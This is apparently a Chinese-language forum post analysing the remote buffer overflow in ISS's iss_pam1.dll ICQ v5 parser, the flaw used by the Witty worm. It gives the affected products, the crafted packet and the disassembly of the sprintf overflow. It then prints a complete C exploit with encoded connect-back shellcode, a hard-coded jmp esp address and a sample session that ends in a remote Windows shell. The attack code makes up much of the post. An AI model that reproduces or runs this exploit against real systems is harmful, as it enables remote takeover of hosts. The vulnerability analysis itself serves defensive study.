iis_pam1.dll 解析ICQ v5協議漏洞利用分析
對於前段時間witty蠕蟲利用的分析, 不知道發這裡合適不合適。
語法:
ISS Protocol Analysis Module (iss_pam1.dll) 解析ICQ v5協議遠端緩衝區溢出漏洞分析
作者: Sam Sam#0x557.org
主頁: http://0x557.org
1. 受影響系統:
ISS RealSecure Network Sensor 7.0 XPU 22.9
ISS RealSecure Network Sensor 7.0 XPU 22.11
ISS RealSecure Network Sensor 7.0 XPU 22.10
ISS RealSecure Network Sensor 7.0 XPU 20.15
ISS RealSecure Server Sensor 7.0 XPU 22.9
ISS RealSecure Server Sensor 7.0 XPU 22.11
ISS RealSecure Server Sensor 7.0 XPU 22.10
ISS RealSecure Server Sensor 7.0 XPU 20.19
ISS RealSecure Server Sensor 7.0 XPU 20.18
ISS RealSecure Server Sensor 7.0 XPU 20.16
ISS BlackIce Server Protection 3.6 ccf
ISS BlackIce Server Protection 3.6 ccb
ISS BlackIce Server Protection 3.6 cbz
ISS BlackIce Server Protection 3.5 cdf
ISS BlackICE Agent for Server 3.6 ecf
ISS BlackICE Agent for Server 3.6 ecb
ISS BlackICE Agent for Server 3.6 eca
ISS BlackICE PC Protection 3.6 ccf
ISS BlackICE PC Protection 3.6 ccd
ISS BlackICE PC Protection 3.6 ccb
ISS BlackICE PC Protection 3.6 cbz
ISS BlackICE PC Protection 3.6 cbr
ISS Proventia A Series XPU 22.9
ISS Proventia A Series XPU 22.11
ISS Proventia A Series XPU 22.10
ISS Proventia A Series XPU 20.15
ISS Proventia G Series XPU 22.9
ISS Proventia G Series XPU 22.3
ISS Proventia G Series XPU 22.11
ISS Proventia G Series XPU 22.10
ISS Proventia M Series XPU 1.9
ISS Proventia M Series XPU 1.8
ISS Proventia M Series XPU 1.7
ISS Proventia M Series XPU 1.3
2. 测试环境:
windows xp en SP1a + ISS BlackICE PC Protection 3.6 ccf
调试工具: IDA pro 4.5 and windbg 6.3
3. 漏洞分析
iss 产品中的协议分析模块 (iss_pam1.dll)在处理ICQ v5协议中的SRV_META_USER命令字段的时候
存在一个远程缓冲区溢出漏洞. 根据ICQ v5协议中的描述和eeye的漏洞描述, 我们需要伪造ICQ server 响应
客户段消息, 并构造如下协议包才能触发该漏洞.
"\x05\x00" // ICQ VERSION
"\x00" // unused
"\x00\x00\x00\x00" // Session ID
"\x12\x02" // reply to SRV_MULTI_PACKET
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x02" // SRV_MULTI Parameter Block 1 of 2
// Number of individual responses
"\x2c\x00" // Size of sub-response (44 bytes, little-endian)
"\x05\x00" // ICQ VERSION
"\x00 // unused
"\x00\x00\x00\x00" // Session ID
"\x6e\x00" // reply to SRV_USER_OLINE
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x00" // UIN of user changing status
"\x01\x00\x00\x00" // Other user's IP address (1.0.0.0)
"\x00\x00\x00\x00" // Other user's direct-connect port (default)
"\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00"
"\x41\x02" // SRV_MULTI Parameter Block 2 of 2
// Size of sub-response (577 bytes)
"\x05\x00" // ICQ VERSION
"\x00" // unused
"\x00\x00\x00\x00" // Session ID
"\xde\x03" // reply to SRV_META_USER
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x01"
"\x00\x00\x01\x00"
"\x00\x01\x00\x00"
"\x1e\x02";
动态调试时候的调用堆栈
blackd!BI_Sensor::sendRaw+0x3f3
|
blackd!processPacket+0x26c
|
iss_pam1!psomReceive+0x11e
|
iss_pam1!psomReceive+0x9a6
|
iss_pam1!psomReceive+0x1938
|
iss_pam1!psomDisplayMem+0x673b9
|
iss_pam1!psomDisplayMem+0x3567c
溢出产生函数:
.text:5E0625A0 sub_5E0625A0 proc near ; CODE XREF: sub_5E092500+1F04�p
.text:5E0625A0
.text:5E0625A0 var_21C = dword ptr -21Ch
.text:5E0625A0 var_1C = dword ptr -1Ch
.text:5E0625A0 var_18 = dword ptr -18h
.text:5E0625A0 var_14 = dword ptr -14h
.text:5E0625A0 var_10 = dword ptr -10h
.text:5E0625A0 var_C = dword ptr -0Ch
.text:5E0625A0 var_8 = dword ptr -8
.text:5E0625A0 var_4 = dword ptr -4
.text:5E0625A0 arg_4 = dword ptr 0Ch
.text:5E0625A0 arg_8 = dword ptr 10h
.text:5E0625A0
.text:5E0625A0 push ebp
.text:5E0625A1 mov ebp, esp
.text:5E0625A3 sub esp, 21Ch // 实际分配堆栈大小为 0x21c
.text:5E0625A9 mov eax, [ebp+arg_8]
.text:5E0625AC push ebx
.text:5E0625AD push esi
.text:5E0625AE cmp eax, 15h
.text:5E0625B1 push edi
.text:5E0625B2 jl loc_5E06275D
.text:5E0625B8 mov ebx, [ebp+arg_4]
.text:5E0625BB xor eax, eax
.text:5E0625BD mov ah, [ebx+1]
.text:5E0625C0 mov al, [ebx]
.text:5E0625C2 cmp eax, 5
.text:5E0625C5 jnz loc_5E06275D
.text:5E0625CB xor edx, edx
.text:5E0625CD xor ecx, ecx
.text:5E0625CF mov dh, [ebx+10h]
.text:5E0625D2 mov ch, [ebx+8]
.text:5E0625D5 mov dl, [ebx+0Fh]
.text:5E0625D8 mov cl, [ebx+7]
.text:5E0625DB xor eax, eax
.text:5E0625DD mov esi, ecx
.text:5E0625DF mov al, [ebx+0Eh]
.text:5E0625E2 xor ecx, ecx
.text:5E0625E4 mov cl, [ebx+0Dh]
.text:5E0625E7 lea edi, [ebp+var_1C]
.text:5E0625EA shl edx, 8
.text:5E0625ED or edx, eax
.text:5E0625EF xor eax, eax
.text:5E0625F1 shl edx, 8
.text:5E0625F4 or edx, ecx
.text:5E0625F6 mov ecx, 6
.text:5E0625FB cmp esi, 212h
.text:5E062601 mov [ebp+var_4], edx
.text:5E062604 rep stosd
.text:5E062606 jnz loc_5E0626A8
.text:5E06260C mov eax, [ebp+arg_8]
.text:5E06260F mov esi, 16h
.text:5E062614 cmp eax, esi
.text:5E062616 jl loc_5E06275D
.text:5E06261C xor eax, eax
.text:5E06261E mov al, [ebx+15h]
.text:5E062621 mov edx, eax
.text:5E062623 dec eax
.text:5E062624 test edx, edx
.text:5E062626 mov [ebp+arg_4], eax
.text:5E062629 jz loc_5E0626C1
.text:5E06262F
.text:5E06262F loc_5E06262F: ; CODE XREF: sub_5E0625A0+104�j
.text:5E06262F mov ecx, [ebp+arg_8]
.text:5E062632 lea eax, [esi+17h]
.text:5E062635 cmp ecx, eax
.text:5E062637 jl loc_5E06275D
.text:5E06263D xor edx, edx
.text:5E06263F xor eax, eax
.text:5E062641 mov dh, [ebx+esi+1]
.text:5E062645 mov ah, [ebx+esi+3]
.text:5E062649 mov dl, [esi+ebx]
.text:5E06264C mov al, [esi+ebx+2]
.text:5E062650 add esi, 2
.text:5E062653 cmp eax, 5
.text:5E062656 mov edi, edx
.text:5E062658 jnz loc_5E06275D
.text:5E06265E cmp edi, 15h
.text:5E062661 jl loc_5E06275D
.text:5E062667 xor eax, eax
.text:5E062669 sub edi, 15h
.text:5E06266C mov ah, [ebx+esi+8]
.text:5E062670 mov al, [ebx+esi+7]
.text:5E062674 add esi, 15h
.text:5E062677 sub ecx, esi
.text:5E062679 cmp edi, ecx
.text:5E06267B jg loc_5E06275D
.text:5E062681 lea ecx, [esi+ebx]
.text:5E062684 push edi
.text:5E062685 push ecx
.text:5E062686 mov ecx, [ebp+var_4]
.text:5E062689 lea edx, [ebp+var_1C]
.text:5E06268C push edx
.text:5E06268D push ecx
.text:5E06268E push eax
.text:5E06268F call sub_5E062770 // 解析icq 协议数据包
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
.text:5E062770 sub_5E062770 proc near ; CODE XREF: sub_5E062400+183�p
.text:5E062770 ; sub_5E0625A0+EF�p ...
.text:5E062770
.text:5E062770 var_2C0 = dword ptr -2C0h
.text:5E062770 var_4 = dword ptr -4
.text:5E062770 arg_0 = dword ptr 8
.text:5E062770 arg_4 = dword ptr 0Ch
.text:5E062770 arg_8 = dword ptr 10h
.text:5E062770 arg_C = dword ptr 14h
.text:5E062770 arg_10 = dword ptr 18h
.text:5E062770
.text:5E062770 push ebp
.text:5E062771 mov ebp, esp
.text:5E062773 sub esp, 2C0h
.text:5E062779 mov eax, off_5E122950
.text:5E06277E push ebx
.text:5E06277F push esi
.text:5E062780 push edi
.text:5E062781 test eax, eax
.text:5E062783 lea esi, [ebp+var_2C0]
.text:5E062789 mov edi, offset off_5E122950 // 获取icq 命令字段基地址
############################################################################################
相应命令在数据段中的分布
.data:5E122950 off_5E122950 dd offset aIcq_cmd_ack ; DATA XREF: sub_5E062770+9�r
.data:5E122950 ; sub_5E062770+19�o
.data:5E122950 ; "ICQ_CMD_ACK"
.data:5E122954 db 0Ah ;
.data:5E122955 db 0 ;
.data:5E122956 db 0 ;
.data:5E122957 db 0 ;
.data:5E122A78 dd offset aIcq_srv_user_0 ; "ICQ_SRV_USER_ONLINE"
.data:5E122A7C db 6Eh ; n
.data:5E122A7D db 0 ;
.data:5E122A7E db 0 ;
.data:5E122A7F db 0 ;
.data:5E122B18 dd offset aIcq_srv_multi_ ; "ICQ_SRV_MULTI_PACKET"
.data:5E122B1C db 12h ;
.data:5E122B1D db 2 ;
.data:5E122B1E db 0 ;
.data:5E122B1F db 0 ;
.data:5E122B30 dd offset aIcq_srv_meta_u ; "ICQ_SRV_META_USER"
.data:5E122B34 db 0DEh ; T
.data:5E122B35 db 3 ;
.data:5E122B36 db 0 ;
.data:5E122B37 db 0 ;
#############################################################################################
.text:5E06278E jz short loc_5E0627C4
.text:5E062790
.text:5E062790 loc_5E062790: ; CODE XREF: sub_5E062770+32�j
.text:5E062790 mov eax, [edi+4] // 读取基地址+4 相应的命令号
.text:5E062793 mov ecx, [ebp+arg_0] // 我们传入的命令号
.text:5E062796 cmp eax, ecx // 比较
.text:5E062798 jz short loc_5E0627A6 // 等于跳转
.text:5E06279A mov eax, [edi+8]
.text:5E06279D add edi, 8 // +8 读取下一个命令
.text:5E0627A0 test eax, eax
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
// sub_5E062770 函数返回
.text:5E062694 mov eax, [ebp+arg_4]
.text:5E062697 add esp, 14h
.text:5E06269A add esi, edi
.text:5E06269C mov edx, eax
.text:5E06269E dec eax
.text:5E06269F test edx, edx
.text:5E0626A1 mov [ebp+arg_4], eax
.text:5E0626A4 jnz short loc_5E06262F
.text:5E0626A6 jmp short loc_5E0626C1
//处理 SRV_META_USER 命令消息
.text:5E0626C1
.text:5E0626C1 loc_5E0626C1: ; CODE XREF: sub_5E0625A0+89�j
.text:5E0626C1 ; sub_5E0625A0+106�j
.text:5E0626C1 mov eax, [ebp+var_18]
.text:5E0626C4 test eax, eax
.text:5E0626C6 jz loc_5E06275D
.text:5E0626CC mov edx, [ebp+var_1C]
.text:5E0626CF lea eax, [ebp+var_21C]
.text:5E0626D5 push edx
.text:5E0626D6 push offset aUinU ; "UIN=%u"
.text:5E0626DB push eax // eax -> buffer
.text:5E0626DC call _sprintf // 打印uin
.text:5E0626E1 lea esi, [ebp+eax+var_21C] // esi-> buffer + eax
.text:5E0626E8 mov eax, [ebp+var_14]
.text:5E0626EB add esp, 0Ch
.text:5E0626EE test eax, eax
.text:5E0626F0 jz short loc_5E062708
.text:5E0626F2 cmp byte ptr [eax], 0
.text:5E0626F5 jz short loc_5E062708
.text:5E0626F7 push eax
.text:5E0626F8 push offset aNicknameS ; ",Nickname=%s"
.text:5E0626FD push esi
.text:5E0626FE call _sprintf
.text:5E062703 add esp, 0Ch
.text:5E062706 add esi, eax
.text:5E062708
.text:5E062708 loc_5E062708: ; CODE XREF: sub_5E0625A0+150�j
.text:5E062708 ; sub_5E0625A0+155�j
.text:5E062708 mov eax, [ebp+var_10]
.text:5E06270B test eax, eax
.text:5E06270D jz short loc_5E062725
.text:5E06270F cmp byte ptr [eax], 0
.text:5E062712 jz short loc_5E062725
.text:5E062714 push eax
.text:5E062715 push offset aFirstnameS ; ",Firstname=%s"
.text:5E06271A push esi
.text:5E06271B call _sprintf
.text:5E062720 add esp, 0Ch
.text:5E062723 add esi, eax
.text:5E062725
.text:5E062725 loc_5E062725: ; CODE XREF: sub_5E0625A0+16D�j
.text:5E062725 ; sub_5E0625A0+172�j
.text:5E062725 mov eax, [ebp+var_C]
.text:5E062728 test eax, eax
.text:5E06272A jz short loc_5E062742
.text:5E06272C cmp byte ptr [eax], 0
.text:5E06272F jz short loc_5E062742
.text:5E062731 push eax
.text:5E062732 push offset aLastnameS ; ",Lastname=%s"
.text:5E062737 push esi
.text:5E062738 call _sprintf
.text:5E06273D add esp, 0Ch
.text:5E062740 add esi, eax
.text:5E062742
// 前面的Nickname/Fristname/Lastname 都可以产生溢出, 这里我们构成的是Email字段的溢出. 因为后面马上函数就返回了.
// eax 指向的是我们的数据. 类似调用 sprintf (buffer, "Email=%s", our_string_here); 导致溢出. 覆盖了函数的返回地址.
.text:5E062742 loc_5E062742: ; CODE XREF: sub_5E0625A0+18A�j
.text:5E062742 ; sub_5E0625A0+18F�j
.text:5E062742 mov eax, [ebp+var_8]
.text:5E062745 test eax, eax
.text:5E062747 jz short loc_5E06275D
.text:5E062749 cmp byte ptr [eax], 0
.text:5E06274C jz short loc_5E06275D
.text:5E06274E push eax
.text:5E06274F push offset aEmailS ; ",Email=%s"
.text:5E062754 push esi
.text:5E062755 call _sprintf
.text:5E06275A add esp, 0Ch
.text:5E06275D
.text:5E06275D loc_5E06275D: ; CODE XREF: sub_5E0625A0+12�j
.text:5E06275D ; sub_5E0625A0+25�j ...
.text:5E06275D pop edi
.text:5E06275E pop esi
.text:5E06275F xor eax, eax
.text:5E062761 pop ebx
.text:5E062762 mov esp, ebp
.text:5E062764 pop ebp
.text:5E062765 retn
.text:5E062765 sub_5E0625A0 endp
4. 利用代码
由于这个溢出需要伪造icq server to client的请求, 所以我们需要伪造源端口为4000, 这样pam就会正常的处理我们的协议包了.
/* 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam and 2004/03/26
* <chen_xiaobo@venustech.com.cn>
* <Sam@0x557.org>
*
*
*
* Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c
*
* how works?
* [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570
* 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit
* - Sam
*
* # attack remote host: 192.168.10.2.
* # listen host: 192.168.10.169.
* # listen port: 5570.
* # send overflow udp datas
* # 1199 bytes send
* # done.
* # make sure we are in, dude :)
*
*
* [root@core root]# nc -vv -l -p 5570
* listening on [any] 5570 ...
* 192.168.10.2: inverse host lookup failed: Host name lookup failure
* connect to [192.168.10.169] from (UNKNOWN) [192.168.10.2] 3604
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Program Files\ISS\BlackICE>
* C:\Program Files\ISS\BlackICE>
* C:\Program Files\ISS\BlackICE>
*
*
* some thanks/greets to:
* eeye (they find this bug :D), airsupply, kkqq, icbm, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
char icq_header [] =
"\x05\x00" // ICQ VERSION
"\x00" // unused
"\x00\x00\x00\x00" // Session ID
"\x12\x02" // reply to SRV_MULTI_PACKET
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x02" // SRV_MULTI Parameter Block 1 of 2
// Number of individual responses
"\x2c\x00" // Size of sub-response (44 bytes, little-endian)
"\x05\x00" // ICQ VERSION
"\x00" // unused
"\x00\x00\x00\x00" // Session ID
"\x6e\x00" // reply to SRV_USER_OLINE
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x00" // UIN of user changing status
"\x01\x00\x00\x00" // Other user's IP address (1.0.0.0)
"\x00\x00\x00\x00" // Other user's direct-connect port (default)
"\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00"
"\x41\x02" // SRV_MULTI Parameter Block 2 of 2
// Size of sub-response (577 bytes)
"\x05\x00" // ICQ VERSION
"\x00" // unused
"\x00\x00\x00\x00" // Session ID
"\xde\x03" // reply to SRV_META_USER
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x01"
"\x00\x00\x01\x00"
"\x00\x01\x00\x00"
"\x1e\x02";
struct sockaddr_in addr, local;
char *bindHost = NULL;
unsigned short port;
/* a1rsupply's really cool shellcode.
* bind shellcode port on 5570 port.
* thx that's shit.
*/
char shellcode [] =
/* decoder */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
/* code */
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50";
/* udpconnect:
*
*/
int udpConnect (char *hostName)
{
struct hostent* host = NULL;
int sock = -1;
host = gethostbyname (hostName);
if (NULL == host) {
perror ("gethostbyname() failed");
return -1;
}
sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if ( -1 == sock) {
perror ("socket() failed\n");
return -1;
}
memset ([$addr, 0x00, sizeof (addr))]
addr.sin_addr = *(struct in_addr *) host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(random());
memset ([$local, 0x00, sizeof (local))]
local.sin_family = AF_INET;
local.sin_addr.s_addr = htonl (INADDR_ANY);
local.sin_port = htons(4000);
if (bind (sock, (struct sockaddr *) &local, sizeof(local)) != 0) {
perror ("bind error\n");
return -1;
}
return sock;
}
/* resolve listen host
*/
unsigned int resolve (char *name)
{
struct hostent *he;
unsigned int ip;
if ((ip = inet_addr (name)) == (-1)) {
if ((he = gethostbyname (name)) ==0 )
return 0;
memcpy ([$ip, he->h_addr, 4)]
}
return ip;
}
/*
* send datas
*/
int udp_send (int sock, char *buffer, int buff_len)
{
int ret;
ret = sendto (sock, buffer, buff_len, 0, (struct sockaddr *)&addr,
sizeof (struct sockaddr_in));
if (ret <= NULL) {
perror ("sendto failed\n");
return -1;
}
fprintf (stderr, "# %d bytes send\n", ret);
return ret;
}
/*
* send evil datas, fuck ISS's blackice.
*/
int do_sendudp_data (char *hostName)
{
unsigned int cb;
int sock;
char expbuf[1200];
memset (expbuf, 0x90, sizeof (expbuf));
memcpy (expbuf, icq_header, sizeof (icq_header) - 1);
/*
* jmp esp opcodes from iss_pam1.dll
*/
*(unsigned int *)[$expbuf[637] = 0x5e077663]
if (!(cb = resolve (bindHost))) {
printf ("Unknown listen host\n");
return -1;
}
port = htons (port);
port ^= 0x9393;
cb ^= 0x93939393;
*(unsigned short *)[$shellcode[330] = port]
*(unsigned int *)[$shellcode[335] = cb]
memcpy (expbuf + 637 + 4, shellcode, strlen (shellcode));
if ((sock = udpConnect (hostName)) < 0) {
printf ("connect failed\n");
exit (-1);
}
fprintf (stderr, "# send overflow udp datas\n");
udp_send (sock, expbuf, sizeof (expbuf) - 1);
close (sock);
return 0;
}
/*
* just main . dude.
*/
int main (int argc, char **argv)
{
int new;
char *target = NULL;
fprintf (stderr, "557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit\n - Sam\n\n");
if (argc != 4) {
fprintf (stderr, "%s <hostname> <listenhost> <listen port>\n", argv[0]);
fprintf (stderr, "listenhost, port: connect back host and port\n\n");
return -1;
}
target = argv[1];
bindHost = argv[2];
port = atoi (argv[3]);
fprintf (stderr, "# attack remote host: %s. \n", target);
fprintf (stderr, "# listen host: %s. \n", bindHost);
fprintf (stderr, "# listen port: %d. \n", port);
do_sendudp_data (target);
fprintf (stderr, "# done.\n");
fprintf (stderr, "# make sure we are in, dude :)\n\n");
return 0;
}
5. 参考资料
Internet Security Systems PAM ICQ Server Response Processing Vulnerability
http://www.eeye.com/html/Research/Ad...D20040318.html
Version 5 of the ICQ Protocol
http://www.cs.berkeley.edu/~mikechen...icq/icqv5.html
Witty Worm Analysis
http://www.lurhq.com/witty.html
|
